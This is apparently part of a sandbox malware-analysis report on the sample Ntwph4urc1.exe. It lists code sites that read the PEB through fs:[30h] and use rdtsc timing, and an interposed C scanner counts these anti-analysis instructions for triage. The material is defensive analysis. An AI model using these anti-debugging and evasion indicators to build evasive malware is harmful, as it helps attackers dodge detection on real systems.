      Source: Ntwph4urc1.exe, 00000006.00000003.3051505446.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000003.3051661184.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093485249.0000000006850000.00000004.00000020.00020000.00000000.sdmp, Ntwph4urc1.exe, 00000006.00000002.3093403938.00000000067F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | API call chain: ExitProcess graph end node (graph_0-4455)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | API call chain: ExitProcess graph end node (graph_0-4301)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A116A6 rdtsc
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369835C0 NtCreateMutant, LdrInitializeThunk
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_73F51B5F GlobalAlloc, lstrcpyW, lstrcpyW, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, GlobalFree, lstrcpyW, GetModuleHandleW, LoadLibraryW, GetProcAddress, lstrlenW
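The rdtsc sites above and the long run of `mov eax, dword ptr fs:[00000030h]` reads that follows are what a static triage pass looks for before any dynamic run: in a 32-bit process fs:[30h] is the PEB pointer, and the PEB is where BeingDebugged, the Ldr module list used for manual import resolution, and NtGlobalFlag live, while rdtsc is the timing primitive. The following C scanner is an added example that is not part of the report or of the sample: it counts the byte encodings of those two instructions in a 32-bit code buffer, the same kind of count the report summarises per function. The buffer it scans is constructed inline for the example; the encodings are x86-32 only (a 64-bit process reads gs:[60h] instead).

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct {
    unsigned peb_reads;   /* mov r32, dword ptr fs:[30h] */
    unsigned rdtsc;       /* rdtsc (0F 31) */
} scan_result;

/* Returns the length of a 32-bit "mov r32, fs:[30h]" starting at p, or 0.
 * Two encodings exist: the short moffs32 form for eax (64 A1 30 00 00 00)
 * and the ModRM disp32-only form for any register
 * (64 8B /r 30 00 00 00 with mod=00, rm=101). */
static size_t match_peb_read(const uint8_t *p, size_t left)
{
    static const uint8_t disp30[4] = { 0x30, 0x00, 0x00, 0x00 };
    if (left >= 6 && p[0] == 0x64 && p[1] == 0xA1 &&
        memcmp(p + 2, disp30, 4) == 0)
        return 6;
    if (left >= 7 && p[0] == 0x64 && p[1] == 0x8B &&
        (p[2] & 0xC7) == 0x05 &&           /* mod=00, rm=101: disp32 only */
        memcmp(p + 3, disp30, 4) == 0)
        return 7;
    return 0;
}

/* Linear byte scan. Without a real disassembler this can also hit operand
 * or data bytes that happen to match, so treat the counts as a triage
 * signal to be confirmed in a disassembler, not as proof. */
scan_result scan_code(const uint8_t *buf, size_t len)
{
    scan_result r = { 0, 0 };
    size_t i = 0;
    while (i < len) {
        size_t n = match_peb_read(buf + i, len - i);
        if (n) { r.peb_reads++; i += n; continue; }
        if (len - i >= 2 && buf[i] == 0x0F && buf[i + 1] == 0x31) {
            r.rdtsc++; i += 2; continue;
        }
        i++;
    }
    return r;
}

/* Constructed sample (not bytes from the analysed file): two timing reads
 * around filler, then three PEB reads into eax, ecx and esi, with the kind
 * of follow-up dereference anti-analysis code performs on the PEB. */
static const uint8_t sample_code[] = {
    0x0F, 0x31,                                /* rdtsc                         */
    0x3B, 0xD9,                                /* cmp ebx, ecx                  */
    0x45, 0x43,                                /* inc ebp ; inc ebx             */
    0x0F, 0x31,                                /* rdtsc                         */
    0x64, 0xA1, 0x30, 0x00, 0x00, 0x00,        /* mov eax, fs:[30h]             */
    0x8B, 0x40, 0x0C,                          /* mov eax, [eax+0Ch]  Peb->Ldr  */
    0x64, 0x8B, 0x0D, 0x30, 0x00, 0x00, 0x00,  /* mov ecx, fs:[30h]             */
    0x0F, 0xB6, 0x41, 0x02,                    /* movzx eax, byte [ecx+2] BeingDebugged */
    0x64, 0x8B, 0x35, 0x30, 0x00, 0x00, 0x00,  /* mov esi, fs:[30h]             */
    0xC3                                       /* ret                           */
};

scan_result scan_sample(void)
{
    return scan_code(sample_code, sizeof sample_code);
}

int main(void)
{
    scan_result r = scan_sample();
    printf("PEB reads via fs:[30h]: %u, rdtsc: %u\n", r.peb_reads, r.rdtsc);
    return 0;
}
```

Run over a memory dump of the injected region (the 0x369xxxxx range in this report) rather than the on-disk NSIS installer, since the PEB-reading code only exists after the loader has unpacked it; on disk the same scan over the installer stub finds almost nothing, which is itself a useful signal.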
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369C368C mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369376B2 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693D6AA mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3694B6C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FF6C7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369716CF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A016CC mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FD6F0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369D36EE mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3696D6E0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369736EF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943616 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36971607 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697F603 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15636 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693F626 mov eax, dword ptr fs:[00000030h] (9 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36979660 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369DD660 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FF78A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A137B6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3696D7B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693F7BA mov eax, dword ptr fs:[00000030h] (9 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FD7B0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369CF7AF mov eax, dword ptr fs:[00000030h] (5 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369C97A9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369457C0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3694D7E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697F71F mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A0972B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36945702 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36947703 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A1B73C mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36939730 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36975734 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3694973A mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FF72E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943720 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3695F720 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E375F mov eax, dword ptr fs:[00000030h] (5 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36953740 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A13749 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693B765 mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36949486 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693B480 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369374B0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369734B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E74B0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A114F6 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A154DB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E94E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369C7410 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3696340D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FF453 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369EB450 mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3694B440 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A1547F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36941460 mov eax, dword ptr fs:[00000030h] (5 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3695F460 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369CB594 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A135B6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693758F mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FF5BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3696F5B0 mov eax, dword ptr fs:[00000030h] (9 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369D35BA mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369DD5B0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369615A9 mov eax, dword ptr fs:[00000030h] (5 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369BD5D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369BD5D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369695DA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369755C0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369615F4 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A155C9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A135D7 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36977505 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36977505 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3694D534 mov eax, dword ptr fs:[00000030h] (6 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697D530 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FB52F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369EF525 mov eax, dword ptr fs:[00000030h] (7 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369EB550 mov eax, dword ptr fs:[00000030h] (3 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697B570 mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693B562 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A092A6 mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697329E mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369C92BC mov eax, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369C92BC mov ecx, dword ptr fs:[00000030h] (2 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15283 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369552A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
      Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369D72A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D72A0 mov eax, dword ptr fs:[00000030h]6_2_369D72A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B2D3 mov eax, dword ptr fs:[00000030h]6_2_3693B2D3
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A152E2 mov eax, dword ptr fs:[00000030h]6_2_36A152E2
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F2D0 mov eax, dword ptr fs:[00000030h]6_2_3696F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F2D0 mov eax, dword ptr fs:[00000030h]6_2_3696F2D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369492C5 mov eax, dword ptr fs:[00000030h]6_2_369492C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369492C5 mov eax, dword ptr fs:[00000030h]6_2_369492C5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B2C0 mov eax, dword ptr fs:[00000030h]6_2_3696B2C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF2F8 mov eax, dword ptr fs:[00000030h]6_2_369FF2F8
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369392FF mov eax, dword ptr fs:[00000030h]6_2_369392FF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB2F0 mov eax, dword ptr fs:[00000030h]6_2_369EB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EB2F0 mov eax, dword ptr fs:[00000030h]6_2_369EB2F0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F12ED mov eax, dword ptr fs:[00000030h]6_2_369F12ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15227 mov eax, dword ptr fs:[00000030h]6_2_36A15227
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977208 mov eax, dword ptr fs:[00000030h]6_2_36977208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36977208 mov eax, dword ptr fs:[00000030h]6_2_36977208
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB256 mov eax, dword ptr fs:[00000030h]6_2_369FB256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB256 mov eax, dword ptr fs:[00000030h]6_2_369FB256
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0D26B mov eax, dword ptr fs:[00000030h]6_2_36A0D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0D26B mov eax, dword ptr fs:[00000030h]6_2_36A0D26B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD250 mov ecx, dword ptr fs:[00000030h]6_2_369CD250
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939240 mov eax, dword ptr fs:[00000030h]6_2_36939240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939240 mov eax, dword ptr fs:[00000030h]6_2_36939240
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697724D mov eax, dword ptr fs:[00000030h]6_2_3697724D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36969274 mov eax, dword ptr fs:[00000030h]6_2_36969274
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36981270 mov eax, dword ptr fs:[00000030h]6_2_36981270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36981270 mov eax, dword ptr fs:[00000030h]6_2_36981270
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3699739A mov eax, dword ptr fs:[00000030h]6_2_3699739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3699739A mov eax, dword ptr fs:[00000030h]6_2_3699739A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E13B9 mov eax, dword ptr fs:[00000030h]6_2_369E13B9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369633A5 mov eax, dword ptr fs:[00000030h]6_2_369633A5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369733A0 mov eax, dword ptr fs:[00000030h]6_2_369733A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369733A0 mov eax, dword ptr fs:[00000030h]6_2_369733A0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A1539D mov eax, dword ptr fs:[00000030h]6_2_36A1539D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FB3D0 mov ecx, dword ptr fs:[00000030h]6_2_369FB3D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A153FC mov eax, dword ptr fs:[00000030h]6_2_36A153FC
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF3E6 mov eax, dword ptr fs:[00000030h]6_2_369FF3E6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0132D mov eax, dword ptr fs:[00000030h]6_2_36A0132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0132D mov eax, dword ptr fs:[00000030h]6_2_36A0132D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C930B mov eax, dword ptr fs:[00000030h]6_2_369C930B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36937330 mov eax, dword ptr fs:[00000030h]6_2_36937330
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696F32A mov eax, dword ptr fs:[00000030h]6_2_3696F32A
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939353 mov eax, dword ptr fs:[00000030h]6_2_36939353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939353 mov eax, dword ptr fs:[00000030h]6_2_36939353
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D34C mov eax, dword ptr fs:[00000030h]6_2_3693D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D34C mov eax, dword ptr fs:[00000030h]6_2_3693D34C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15341 mov eax, dword ptr fs:[00000030h]6_2_36A15341
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947370 mov eax, dword ptr fs:[00000030h]6_2_36947370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E3370 mov eax, dword ptr fs:[00000030h]6_2_369E3370
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FF367 mov eax, dword ptr fs:[00000030h]6_2_369FF367
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36945096 mov eax, dword ptr fs:[00000030h]6_2_36945096
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D090 mov eax, dword ptr fs:[00000030h]6_2_3696D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696D090 mov eax, dword ptr fs:[00000030h]6_2_3696D090
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697909C mov eax, dword ptr fs:[00000030h]6_2_3697909C
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD080 mov eax, dword ptr fs:[00000030h]6_2_369CD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CD080 mov eax, dword ptr fs:[00000030h]6_2_369CD080
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693D08D mov eax, dword ptr fs:[00000030h]6_2_3693D08D
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369690DB mov eax, dword ptr fs:[00000030h]6_2_369690DB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
